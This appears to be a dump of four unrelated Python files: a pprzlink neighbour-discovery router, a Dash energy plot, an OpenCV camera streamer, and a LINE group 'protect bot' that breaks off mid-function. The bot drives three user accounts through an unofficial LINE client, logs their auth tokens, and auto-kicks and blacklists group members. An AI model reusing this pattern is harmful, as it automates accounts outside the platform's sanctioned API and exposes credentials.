network_pprz_tcp.py
|
#!/usr/bin/env python3
"""
Router class is part of a thesis work about distributed systems
"""
__author__ = "Julie Morvan"
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "Julie Morvan"
__email__ = "julie.morvan999@hotmail.fr"
import socket, os, math, struct, sys, json, traceback, zlib, fcntl, threading, time, pickle
from apscheduler.schedulers.background import BackgroundScheduler
import pprzlink.tcp
import pprzlink.messages_xml_map as messages_xml_map
import pprzlink.message as message
from pprzlink.pprz_transport import PprzTransport
class Network():
def __init__(self, Node, ip):
        'Initializes the properties of the Network object'
self.scheduler = BackgroundScheduler()
#### NODE ###############################################################################
self.Node = Node
self.NodeNumber = self.Node.tag_number
        self.visible = [] # our currently visible neighbours
        self.ever_visible = [] # every neighbour we have ever seen
self.visibility_lost = []
self.messages_created = [] # messages created by each node
self.messages = []
self.average = 0
self.topology = []
self.down_port = 57555 # UDP/TCP port
self.up_port = 57444 # UDP port
#### NETWORK ##############################################################################
self.ip = ip
if self.ip == 'IPV4':
self.bcast_group = '10.0.0.255' # broadcast ip address
elif self.ip == 'IPV6':
self.bcast_group = 'ff02::1'
self.port = 56123 # UDP port
self.max_packet = 65535 # max packet size to listen
#### UTILITIES ############################################################################
self.protocol_stats = [0,0,0,0] # created, forwarded, delivered, discarded
self.errors = [0,0,0]
self.myip = ''
#### Layer specific ####################################################################
        self.ttl = 16 # not currently used
self.fanout_max = 3
self.mode = "NDM" #close neighbouhood discover mode
self.packets = 0
self.traffic = 0
self.helloInterval = 0.2
        self.visible_timeout = self.helloInterval * 5 # timeout (s) after which visible neighbours are removed from the list; TODO: make this a setting
##################### END OF DEFAULT SETTINGS ###########################################################
self._setup()
self.listener_thread = threading.Thread(target=self._listener, args=())
self.sender_thread = threading.Thread(target=self._sender, args=())
self.scheduler.add_job(self._sendHello, 'interval', seconds=self.helloInterval, id='membership')
self.scheduler.add_job(self._analyse_visible, 'interval', seconds=0.1, id='membership_analysis')
############### Public methods ###########################
def start(self):
self.listener_thread.start()
self.sender_thread.start()
self.scheduler.start()
def shutdown(self):
self.scheduler.shutdown()
self.listener_thread.join(timeout=2)
self.sender_thread.join(timeout=2)
def printinfo(self):
'Prints general information about the node'
print()
print("STUB - Using the OS routing and network")
print("Broadcast IP: " + self.bcast_group)
print()
def printvisible(self):
print("Visible neighbours at:" + str(self.Node.simulation_seconds) )
print("===============================================================================")
print("|Node ID |Battery |State |Processor |Memory |Last seen |Address")
print("-------------------------------------------------------------------------------")
        for member in range(len(self.visible)): # print characteristics of the neighbours
print("|" + self.visible[member][0] + " |" + str(self.visible[member][1]) + " |" + str(self.visible[member][2]) + " |" + str(self.visible[member][3]) + " |" + str(self.visible[member][4]) + " |" + str(self.visible[member][5])+ " |" + str(self.visible[member][6]))
print("===============================================================================")
############### Private methods ##########################
def _setup(self):
        with open("./classes/network/settings.json", "r") as settings_file:
            settings = json.loads(settings_file.read())
self.port = settings['networkPort']
self.bcast_group = settings['ipv4bcast']
self.helloInterval = settings['helloInterval']
self.visible_timeout = settings['visibleTimeout']
def _listener(self):
'This method uses pprzlink to receive data.'
#self.udp = pprzlink.udp.UdpMessagesInterface(
self.tcp = pprzlink.tcp.TcpMessagesInterface(
self._packet_handler, # Callback
uplink_port = self.up_port, # Port we send messages to
downlink_port = self.down_port, # Port used to receive messages
verbose = False,
interface_id = self.NodeNumber # Numerical id of the interface
)
self.tcp.start()
def _sender(self):
'Uses pprzlink to send data'
self.tcp_sender = pprzlink.tcp.TcpMessagesInterface(
self._packet_handler, # Callback function
uplink_port = self.down_port, # Port we send messages to
downlink_port = self.up_port, # Port used to receive messages
interface_id = self.NodeNumber # Numerical id of the interface
)
self.tcp_sender.start()
def _packet_handler(self, sender, address, msg, length, receiver_id = None, component_id = None):
'When a message of type genesis is received from neighbours this method unpacks and handles it'
if msg.name == "HELLO":
# Unpack the hello message
node = b''.join(msg.get_field(0)).decode()
battery = msg.get_field(1)
state = msg.get_field(2)
processor = msg.get_field(3)
memory = msg.get_field(4)
if (node != self.Node.fulltag):
                if len(self.visible) > 0: # List not empty; check if the node is already there
not_there = 1
for element in range(len(self.visible)):
if node == self.visible[element][0]: # If already there: update
self.visible[element][5] = self.Node.simulation_seconds # refresh timestamp
self.visible[element][4] = memory # refresh memory
self.visible[element][3] = processor # refresh processor load
self.visible[element][2] = state # refresh state
self.visible[element][1] = battery # refresh battery
not_there = 0
break
if not_there: # If not there: add the node to the neighbours
self.visible.append([node, battery, state, processor, memory, self.Node.simulation_seconds, address[0]])
else: # Empty neighbours list, add the node to the neighbours
self.visible.append([node, battery, state, processor, memory, self.Node.simulation_seconds, address[0]])
else:
print('not hello')
def _createHello(self):
_hello = message.PprzMessage('genesis', 'HELLO')
_hello.set_value_by_name("nodeid", self.Node.fulltag) # associate values to the different fields of the HELLO message
_hello.set_value_by_name("battery", 85)
_hello.set_value_by_name("state", 1)
_hello.set_value_by_name("cpu_load", 50)
_hello.set_value_by_name("used_memory", 25)
self.messages_created.append([hex(1),self.Node.simulation_seconds])
return _hello
def _sendHello(self):
self.tcp_sender.send(self._createHello(), self.NodeNumber, self.bcast_group, 255) # send hello message to broadcast
self._update_visible()
def _setbcast(self, bcast):
self.bcast_group = bcast
def _update_visible(self):
for member in range(len(self.visible)):
if (self.Node.simulation_seconds - self.visible[member][5] > self.visible_timeout):
del self.visible[member]
break
def _analyse_visible(self):
for member in range(len(self.visible)):
found = 0
for ever_member in range(len(self.ever_visible)):
if self.visible[member][0] == self.ever_visible[ever_member][0]:
found = 1
if self.ever_visible[ever_member][5] != 0:
                        # calculate absence duration
                        absence = int(time.time() * 1000) - self.ever_visible[ever_member][5]
                        # store absence for the report
                        self.visibility_lost.append([self.ever_visible[ever_member][0], absence])
self.ever_visible[ever_member][5] = 0
if found == 0:
self.ever_visible.append([self.visible[member][0], 0, 0, 0, 0, 0,0])
for ever_member in range(len(self.ever_visible)):
found = 0
for member in range(len(self.visible)):
if self.visible[member][0] == self.ever_visible[ever_member][0]:
found = 1
if found == 0:
if self.ever_visible[ever_member][5] == 0:
self.ever_visible[ever_member][1] -= 1 # values to modify later (battery - 1)
self.ever_visible[ever_member][2] += 1 # (state + 1)
self.ever_visible[ever_member][3] += 1 # (processor load + 1)
self.ever_visible[ever_member][4] -= 1 # (memory - 1)
self.ever_visible[ever_member][5] = int(time.time() * 1000)
def _print_ever(self):
for member in self.ever_visible:
print(member)
def _prompt(self, command):
if (len(command)) >= 2:
if command[1] == 'help':
self._printhelp()
elif command[1] == 'info':
self.printinfo()
elif command[1] == 'bcast':
self._setbcast(command[2])
elif command[1] == 'ever':
self._print_ever()
elif command[1] == 'lost':
for member in self.visibility_lost:
print(member)
else:
print("Invalid Option")
self._printhelp()
elif (len(command)) == 1:
self.printinfo()
def _get_ip(self,iface = 'eth0'):
'Gets IP address'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockfd = sock.fileno()
SIOCGIFADDR = 0x8915
ifreq = struct.pack('16sH14s', iface.encode('utf-8'), socket.AF_INET, b'\x00'*14)
try:
res = fcntl.ioctl(sockfd, SIOCGIFADDR, ifreq)
        except OSError:
traceback.print_exc()
return None
ip = struct.unpack('16sH2x4s8x', res)[2]
return socket.inet_ntoa(ip)
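# Hedged usage sketch: Network expects a Node-like object exposing tag_number,
# fulltag and simulation_seconds (inferred from the code above); `node` is an
# illustrative assumption.
#
#     net = Network(node, 'IPV4')
#     net.start()          # spawns listener/sender threads and the hello scheduler
#     net.printvisible()   # inspect discovered neighbours
#     net.shutdown()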
|
dash_ppdyn.py
|
import ini
import time
import os.path
from os.path import join as pjoin
import numpy as np
import pandas as pd
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import plotly.graph_objects as go
import webbrowser
# from multiprocessing import Process
def dash_energy(input_file):
    path = 'data'
    params = ini.parse(open(input_file).read())
N = int(params['particles']['N']) # Number of particles
tmax = float(params['time']['tmax'])
realTime = bool(params['diagnostics']['realTime'])
pd.options.plotting.backend = "plotly"
countdown = 20
if os.path.exists(pjoin(path,'energy.txt')):
time,energy = np.loadtxt(pjoin(path,'energy.txt'),unpack=True)
data = np.stack((time, energy), axis=1)
df = pd.DataFrame(data, columns=['timestep', 'Energy'])
fig = df.plot(template = 'plotly_dark')
else:
fig = go.Figure(data=[go.Scatter(x=[], y=[])])
fig.layout.template = 'plotly_dark'
app = dash.Dash(__name__, update_title=None) # remove "Updating..." from title
app.layout = html.Div([
html.H1("PPDyn: Energy"),
dcc.Interval(
id='interval-component',
interval=1*1000, # in milliseconds
n_intervals=0
),
dcc.Graph(id='graph'),
])
# Define callback to update graph
@app.callback(
Output('graph', 'figure'),
[Input('interval-component', "n_intervals")]
)
def streamFig(value):
global df
if os.path.exists(pjoin(path,'energy.txt')):
time,energy = np.loadtxt(pjoin(path,'energy.txt'),unpack=True)
data = np.stack((time, energy), axis=1)
df1 = pd.DataFrame(data, columns=['timestep', 'Energy'])
fig = df1.plot(x= 'timestep', y='Energy',template = 'plotly_dark')
else:
fig = go.Figure(data=[go.Scatter(x=[], y=[])])
fig.layout.template = 'plotly_dark'
#fig.show()
return(fig)
# def run():
# app.scripts.config.serve_locally = True
# app.run_server(port = 8069, dev_tools_ui=True, debug=False,
# dev_tools_hot_reload =True, threaded=False)
# s = Process(target=run)
# s.start()
webbrowser.open('http://127.0.0.1:8069/')
app.scripts.config.serve_locally = True
app.run_server(port = 8069, dev_tools_ui=True, debug=False,
dev_tools_hot_reload =True, threaded=False)
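# Hedged usage sketch ('input.ini' is an illustrative path; the file must
# contain the [particles], [time] and [diagnostics] keys read above):
#
#     dash_energy('input.ini')  # serves http://127.0.0.1:8069/ and opens a browser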
|
StreamCameraVideo.py
|
# import the necessary packages
from threading import Thread
import cv2
import time
import datetime
import logging
from CameraSettings import CameraSettings
from CameraMemory import CameraMemory
"""
Implement a camera based video stream.
Tested on Raspberry Pi 3B, 3B+, 4, a Windows 10 Thinkpad T570, and two Logitech USB cams.
"""
class StreamCameraVideo(): #--------------------------------
def __init__(self, camera_name='0', camera_settings=None, camera_memory=None):
self.logger = logging.getLogger(__name__)
self.logger.info(__name__)
self.stream = cv2.VideoCapture(int(camera_name)) # setup stream
self.camera_memory = CameraMemory(camera_memory) # remember memory type and camera settings
self.camera_settings = CameraSettings(self.stream,camera_settings)
self.starttime = 0 # keep track of some metrics
self.stoptime = 0
self.stopped = True
self.frame_count = 1
self.width=640
self.height=480
self.read_fps = 30.0
        if not self.stream.isOpened():
            self.logger.error("couldn't open camera: " + camera_name)
self.camera_memory.write((-2,None,""))
return
def config(self, params):
# params is dict like: {'camera_type': 'camera', 'camera_name': '0', 'camera_memory': ['deque', ' 100', '1'],
# 'camera_settings': [['CAP_PROP_AUTO_EXPOSURE', '.75']], 'read_fps': 30.0, 'width': 1280, 'height': 720}
if params == None:
return
self.camera_type = params['camera_type']
self.camera_name = int(params['camera_name'])
self.camera_memory = None
self.camera_memory = CameraMemory(camera_memory=params['camera_memory'])
self.camera_settings = None
cs = params['camera_settings']
self.camera_settings = CameraSettings(self.stream,camera_settings=params['camera_settings'])
self.read_fps = float(params['read_fps'])
self.width = int(params['width'])
self.height = int(params['height'])
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT,self.height)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH,self.width)
self.stream.set(cv2.CAP_PROP_FPS,self.read_fps)
return
def start(self):
# start the thread to read frames from the video stream
t = Thread(target=self.update, name='StreamCameraVideo', args=())
t.daemon = True
self.starttime = time.time()
t.start()
time.sleep(1)
return self
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
time.sleep(0.2)
self.stream.release()
return
def update(self):
self.stopped = False
# Loop
while True:
if self.stopped:
break
(ret, self.frame) = self.stream.read()
if not ret:
self.camera_memory.write((-1,self.frame, ""))
break
# always store frame number and timestamp with frame as Tuple (,,)
timestamp = datetime.datetime.now().strftime("%Y%m%d.%H%M%S")+".%07d"%self.frame_count
self.camera_memory.write((self.frame_count,self.frame,timestamp))
self.frame_count += 1
# stopped
self.stoptime = time.time()
def read(self):
# return the frame most recently read from memory
return self.camera_memory.read()
def settings(self,camera_settings=None):
res = self.camera_settings.settings(camera_settings)
#time.sleep(0.1)
return res
def memory(self,camera_memory=None):
res = self.camera_memory.memory(camera_memory)
#time.sleep(0.1)
return res
def stats(self):
duration = self.stoptime-self.starttime
fps = self.frame_count/duration
return 'stats:%s, duration:%f, frame_count:%d, FPS:%.2f' % (__name__,duration,self.frame_count,fps)
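# e.g. 'stats:__main__, duration:10.021135, frame_count:301, FPS:30.03' when run directly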
# Test -------------------------------------
def main():
cv2.namedWindow("TestStreamCameraVideo", cv2.WINDOW_NORMAL)
cv2.resizeWindow("TestStreamCameraVideo", 1280,720)
cv2.moveWindow("TestStreamCameraVideo", 100,100)
# read from a camera
camera_memory = ['frame', 1]
#camera_settings = [["CAP_PROP_AUTO_EXPOSURE", .75],['CAP_PROP_BRIGHTNESS',250.0]]
camera_settings = [["CAP_PROP_FRAME_WIDTH", 1280],[cv2.CAP_PROP_FRAME_HEIGHT,720]]
camera = StreamCameraVideo(0,camera_settings, camera_memory)
camera.start()
i=0
previous = -3
while True:
(num, frame,timestamp) = camera.read()
if num == 0:
continue
if previous==num:
time.sleep(0.02)
continue
previous = num
if num == -1: # finished
break
cv2.imshow("TestStreamCameraVideo",frame)
print(timestamp)
key = cv2.waitKey(1) & 0xFF
if key == ord('q') or key == 27:
break
i += 1
camera.stop()
cv2.destroyAllWindows()
print(camera.stats())
print("main read ",i)
if __name__ == '__main__':
main()
|
main.py
|
'''
┏━━━━━━━━━━━━━━━━━
┣ 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ.
┣ ©2020 ᴍᴏ-ʙᴀɴᴢᴜ
┗━━━━━━━━━━━━━━━━━
'''
from linepy import *
from akad.ttypes import *
from akad.ttypes import Message
from akad.ttypes import ContentType as Type
from akad.ttypes import TalkException
from akad.ttypes import IdentityProvider, LoginResultType, LoginRequest, LoginType
from akad.ttypes import LiffChatContext, LiffContext, LiffSquareChatContext, LiffNoneContext, LiffViewRequest
from akad.ttypes import ChatRoomAnnouncementContents
from akad.ttypes import Location
from akad.ttypes import ChatRoomAnnouncement
from thrift import transport, protocol, server
from thrift.Thrift import *
from thrift.TMultiplexedProcessor import *
from thrift.TSerialization import *
from thrift.TRecursive import *
from thrift.protocol import TCompactProtocol, TMultiplexedProtocol, TProtocol
from thrift.transport import TTransport, TSocket, THttpClient, TZlibTransport
from multiprocessing import Pool, Process
from time import sleep
import pytz, datetime, time, timeit, livejson, asyncio, random, sys, ast, re, os
import json, subprocess, threading, string, codecs, requests, ctypes, urllib
import traceback, tempfile, platform
from humanfriendly import format_timespan, format_size, format_number, format_length
from datetime import timedelta, date
from datetime import datetime
from threading import Thread, activeCount
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
_session = requests.session()
try:
import urllib.request as urllib2
except ImportError:
import urllib2
programStart = time.time()
a001 = LINE('EMAIL','PASSWORD')
print('》》》》UNIT 001 READY《《《《')
a002 = LINE('EMAIL','PASSWORD')
print('》》》》UNIT 002 READY《《《《')
a003 = LINE('EMAIL','PASSWORD')
print('》》》》UNIT 003 READY《《《《\n')
a001.log("[ M001D23 ]\n" + str(a001.authToken))
a002.log("[ M002D23 ]\n" + str(a002.authToken))
a003.log("[ M003D23 ]\n" + str(a003.authToken))
print('\n━━━━━━━━━━━━━━━━━━━━━━━━━━━')
print('\n██████╗░██████╗░███████╗██╗\n██╔══██╗██╔══██╗██╔════╝██║\n██║░░██║██████╔╝█████╗░░██║\n██║░░██║██╔══██╗██╔══╝░░╚═╝\n██████╔╝██║░░██║███████╗██╗\n╚═════╝░╚═╝░░╚═╝╚══════╝╚═╝')
print('\n》》》》PROGRAM STARTED《《《《\n')
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
M001D23 = a001.getProfile().mid
M002D23 = a002.getProfile().mid
M003D23 = a003.getProfile().mid
army = [a001,a002]
antijs = [a003]
oepoll = OEPoll(a001)
call = a001
loop = asyncio.get_event_loop()
status = livejson.File('status.json', True, False, 4)
with open("settings.json","r",encoding="utf-8") as fp:
settings = json.load(fp)
creator = status["creator"]
owner = status["owner"]
admin = status["admin"]
staff = status["staff"]
mybots = status["mybots"]
blacklist = status["blacklist"]
promax = status["promax"]
strictmode = status["strictmode"]
Bots = [M001D23,M002D23,M003D23]
Botslist = [a001,a002,a003]
resp1 = a001.getProfile().displayName
resp2 = a002.getProfile().displayName
resp3 = a003.getProfile().displayName
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
helpCmd = '''┏━━━━━━━━━━━━━━━━━
┣━━━━ 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ.
┣ Protection
┣ Group
┣ Access
┣ Option
┣ Settings
┣ Reboot/Shutdown
┣━━━━ ©2020 ᴍᴏ-ʙᴀɴᴢᴜ
┗━━━━━━━━━━━━━━━━━'''
proCmd = '''┏━━━━━━━━━━━━━━━━━
┣━━━━ Protection
┣ Kick/Invite [ Mention ]
┣ Protect [ Max/None ]
┣ Strictmode [ On/Off ]
┣ Protectlist
┣ Checkbot
┣ Purge
┗━━━━━━━━━━━━━━━━━'''
groupCmd = '''┏━━━━━━━━━━━━━━━━━
┣━━━━ Group
┣ Ginfo
┣ Join
┣ Leave/Leave 1-3
┣ Invto [ Num ]
┣ Grouplist 1-3
┣ Mention/Tagall
┣ Memberlist/Pendinglist
┣ Openqr/Closeqr
┗━━━━━━━━━━━━━━━━━'''
accessCmd = '''┏━━━━━━━━━━━━━━━━━
┣━━━━ Access
┣ Blacklist/Banlist
┣ Clearban
┣ Abort/Eject
┣ Squad List
┣ View Bots/Access
┣ Add/Del Owner [ Mention ]
┣ Add/Del Admin [ Mention ]
┣ Add/Del Staff [ Mention ]
┣ Add/Del Squad [ Mention ]
┣ Add/Del Ban [ Mention ]
┣ Owner:Recruit/Expel
┣ Admin:Recruit/Expel
┣ Staff:Recruit/Expel
┣ Squad:Add/Del
┣ Ban:Add/Del
┗━━━━━━━━━━━━━━━━━'''
optCmd ='''┏━━━━━━━━━━━━━━━━━
┣━━━━ Option
┣ Allowliff
┣ Creator
┣ Respon/Ping
┣ Speed/Debug
┣ Me/About
┣ Mid/Mid [ Mention ]
┣ Contact [ Mention ]
┗━━━━━━━━━━━━━━━━━'''
setCmd = '''┏━━━━━━━━━━━━━━━━━
┣━━━━ Settings
┣ Changepict:1-3/All
┣ Changebio:1-3/All [ Bio ]
┣ Changename:1-3/All [ Name ]
┗━━━━━━━━━━━━━━━━━'''
aboutCmd ='''┏━━━━━━━━━━━┓ ▕ HΞLLTΞRHΞΛD ᴄᴏʀᴘ.
┃▏╰━╮┏┈┓╭━╯▕┃ ▕ Protect Bot
┃▏═━┈┫𐀀┣┈━═▕┃ ▕ v5.3
┃▏╭━╯┗┈┛╰━╮▕┃ ▕ ©2020 ᴍᴏ-ʙᴀɴᴢᴜ
┗━━━━━━━━━━━┛ ▕ github.com/hellterhead'''
dreX53 = '''██████╗░██████╗░███████╗██╗
██╔══██╗██╔══██╗██╔════╝██║
██║░░██║██████╔╝█████╗░░██║
██║░░██║██╔══██╗██╔══╝░░╚═╝
██████╔╝██║░░██║███████╗██╗
╚═════╝░╚═╝░░╚═╝╚══════╝╚═╝'''
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
for hlth in Botslist:
for xdrex in Bots:
try:
hlth.findAndAddContactsByMid(xdrex)
except:
pass
def backupData():
    try:
        with codecs.open('settings.json', 'w', 'utf-8') as f:
            json.dump(settings, f, sort_keys=True, indent=4, ensure_ascii=False)
        return True
    except Exception:
        return False
def restartProgram():
print('\n》》》》PROGRAM RESTARTED《《《《\n')
backupData()
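# os.execl replaces the current process with a fresh interpreter running the
# same script and argv, so all state is reloaded from disk after a reboot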
python = sys.executable
os.execl(python, python, *sys.argv)
def runtime(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours,24)
weeks, days = divmod(days,7)
months, weeks = divmod(weeks,4)
text = ""
if months != 0: text += "%02d Months" % (months)
if weeks != 0: text += " %02d Weeks" % (weeks)
if days != 0: text += " %02d Days" % (days)
if hours != 0: text += " %02d Hours" % (hours)
if mins != 0: text += " %02d Minutes" % (mins)
if secs != 0: text += " %02d Seconds" % (secs)
text = text.strip()
if not text:
    text = "00 Seconds"
return text
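# e.g. runtime(3725) -> "01 Hours 02 Minutes 05 Seconds"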
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def logError(text):
a001.log("[ ERROR ] {}".format(str(text)))
tz = pytz.timezone("Asia/Jakarta")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.now(tz=tz)
# '%A' gives the full English day name and '%m' is zero-padded, so index the lists directly
hasil = hari[day.index(inihari.strftime('%A'))]
bln = bulan[int(inihari.strftime('%m')) - 1]
stamp = "{}, {} - {} - {} | {}".format(hasil, inihari.strftime('%d'), bln, inihari.strftime('%Y'), inihari.strftime('%H:%M:%S'))
with open("logError.txt","a") as error:
    error.write("\n[ {} ] {}".format(stamp, text))
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def sendMention(to, text="", mids=[]):
arrData = ""
arr = []
mention = "@dreMention"
if mids == []:
raise Exception("Invalid mids")
if "@!" in text:
if text.count("@!") != len(mids):
raise Exception("Invalid mids")
texts = text.split("@!")
textx = ""
for mid in mids:
textx += str(texts[mids.index(mid)])
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mid}
arr.append(arrData)
textx += mention
textx += str(texts[len(mids)])
else:
textx = ""
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mids[0]}
arr.append(arrData)
textx += mention + str(text)
a001.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
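# Each "@!" placeholder in `text` must pair with one mid; it is replaced by the
# 11-char "@dreMention" token and a {'S': start, 'E': end, 'M': mid} entry in
# the MENTION metadata, e.g. sendMention(to, "Hi @! and @!", [mid1, mid2]).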
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def sendTemplate(to, data):
xyz = LiffChatContext(to)
xyzz = LiffContext(chat=xyz)
view = LiffViewRequest('1602687308-GXq4Vvk9', xyzz)
token = a001.liff.issueLiffView(view)
url = 'https://api.line.me/message/v3/share'
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer %s' % token.accessToken
}
data = {"messages":[data]}
requests.post(url, headers=headers, data=json.dumps(data))
def allowLiff():
url = 'https://access.line.me/dialog/api/permissions'
data = {
'on': [
'P',
'CM'
],
'off': []
}
headers = {
'X-Line-Access': a001.authToken,
'X-Line-Application': a001.server.APP_NAME,
'X-Line-ChannelId': '1602687308',
'Content-Type': 'application/json'
}
requests.post(url, json=data, headers=headers)
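# Grants the hard-coded LIFF channel (1602687308) the 'P' and 'CM' permission
# scopes (presumably profile and chat-message access) so the token issued in
# sendTemplate() is authorized for the share API.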
def sendFooter(receiver, text):
label = settings["label"]
icon = settings["iconUrl"]
link = settings["linkUrl"]
data = {
"type": "text",
"text": text,
"sentBy": {
"label": "{}".format(label),
"iconUrl": "{}".format(icon),
"linkUrl": "{}".format(link)
}
}
sendTemplate(receiver, data)
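# sendFooter wraps sendTemplate: a plain text message plus a "sentBy" footer
# whose label/icon/link come from settings.json, delivered via the v3 share API.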
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def kick(group, target):
    # a001 acts first; any failure (including a non-None result) falls back to a002
    try:
        if a001.kickoutFromGroup(group, [target]) is not None:
            raise RuntimeError("kick via a001 failed")
    except:
        try:
            a002.kickoutFromGroup(group, [target])
        except:
            pass
def cancel(group, target):
    try:
        if a001.cancelGroupInvitation(group, [target]) is not None:
            raise RuntimeError("cancel via a001 failed")
    except:
        try:
            a002.cancelGroupInvitation(group, [target])
        except:
            pass
def invite(group, target):
    try:
        a001.findAndAddContactsByMid(target)
        if a001.inviteIntoGroup(group, [target]) is not None:
            raise RuntimeError("invite via a001 failed")
    except:
        try:
            a002.findAndAddContactsByMid(target)
            a002.inviteIntoGroup(group, [target])
        except:
            pass
def lockqr(group):
    try:
        G = a001.getGroup(group)
        G.preventedJoinByTicket = True
        if a001.updateGroup(G) is not None:
            raise RuntimeError("lockqr via a001 failed")
    except:
        try:
            G = a002.getGroup(group)
            G.preventedJoinByTicket = True
            a002.updateGroup(G)
        except:
            pass
def join(group):
try:
a001.acceptGroupInvitation(group)
except:
try:
a002.acceptGroupInvitation(group)
except:
pass
def reject(group):
try:
a001.rejectGroupInvitation(group)
except:
try:
a002.rejectGroupInvitation(group)
except:
pass
def backup(group, target):
try:
a001.inviteIntoGroup(group, [target])
if target == M002D23:
a002.acceptGroupInvitation(group)
except:
try:
a002.inviteIntoGroup(group, [target])
if target == M001D23:
a001.acceptGroupInvitation(group)
except:
pass
def antijs(group, target):
a003.acceptGroupInvitation(group)
a003.kickoutFromGroup(group, [target])
try:
a003.inviteIntoGroup(group, [M001D23,M002D23])
a001.acceptGroupInvitation(group)
a002.acceptGroupInvitation(group)
time.sleep(3)
a003.leaveGroup(group)
except:
pass
def blacklist(target):
try:
if target in creator or target in owner or target in admin or target in staff or target in mybots or target in Bots:
pass
else:
if target in status["blacklist"]:
pass
else:
status["blacklist"].append(target)
except:
pass
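# NB: this def rebinds the module-level name `blacklist` (the list loaded from
# status.json above); the list itself stays reachable as status["blacklist"],
# which is what these checks use. The same applies to `antijs` defined earlier.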
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def logspeed():
    # time a getProfile() round-trip on the primary account
    get_profile_time_start = time.time()
    a001.getProfile()
    get_profile_time = time.time() - get_profile_time_start
    return "[ Bots Speed ]\n- Took: %.3f ms\n- Taken: %.5f s" % (get_profile_time * 1000, get_profile_time)
def debug():
    get_profile_time_start = time.time()
    get_profile = a001.getProfile()
    get_profile_time = time.time() - get_profile_time_start
    get_group_time_start = time.time()
    a001.getGroupIdsJoined()
    get_group_time = time.time() - get_group_time_start
    get_contact_time_start = time.time()
    a001.getContact(get_profile.mid)
    get_contact_time = time.time() - get_contact_time_start
    elapsed_time = time.time() - get_profile_time_start
    return "[ Debug ]\n- Send Respon: %.5f\n- Get Profile: %.5f\n- Get Contact: %.5f\n- Get Group: %.5f" % (elapsed_time, get_profile_time, get_contact_time, get_group_time)
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def command(text):
xmobz = text.lower()
if settings['setKey']['status']:
if xmobz.startswith(settings['setKey']['key']):
cmd = xmobz.replace(settings['setKey']['key'],'')
else:
cmd = 'Undefined command'
else:
cmd = text.lower()
return cmd
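# e.g. with setKey = {'status': True, 'key': '!'}: command("!Help") -> "help",
# while command("Help") -> "Undefined command"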
def removeCmd(text, key=''):
if key == '':
setKey = '' if not settings['setKey']['status'] else settings['setKey']['key']
else:
setKey = key
text_ = text[len(setKey):]
sep = text_.split(' ')
return text_[len(sep[0] + ' '):]
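# e.g. removeCmd("!changename:1 New Name") -> "New Name" when the set key is "!"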
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
async def mobanzu(op):
try:
if settings["restartPoint"] is not None:
a001.sendMessage(settings["restartPoint"],"[ Bots Operated Again... ]")
settings["restartPoint"] = None
if op.type == 0:
# print ("[ 0 ] END OF OPERATION")
return
if op.type == 11 or op.type == 122:
if op.type == 11: print ("[ 11 ] NOTIFIED UPDATE GROUP")
else: print ("[ 122 ] NOTIFIED UPDATE CHAT")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck1 = threading.Thread(target=lockqr, args=(op.param1,)).start()
fck2 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param1 in status["promax"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_1 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_2 = threading.Thread(target=lockqr, args=(op.param1,)).start()
d23X_3 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param2 in status["blacklist"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
try:
d23X_4 = threading.Thread(target=lockqr, args=(op.param1,)).start()
d23X_5 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param3 in status["blacklist"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
try:
d23X_6 = threading.Thread(target=lockqr, args=(op.param1,)).start()
d23X_7 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param3 == '4':
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_8 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
groupqr = a001.getGroup(op.param1)
if groupqr.preventedJoinByTicket == False:
d23X_9 = threading.Thread(target=lockqr, args=(op.param1,)).start()
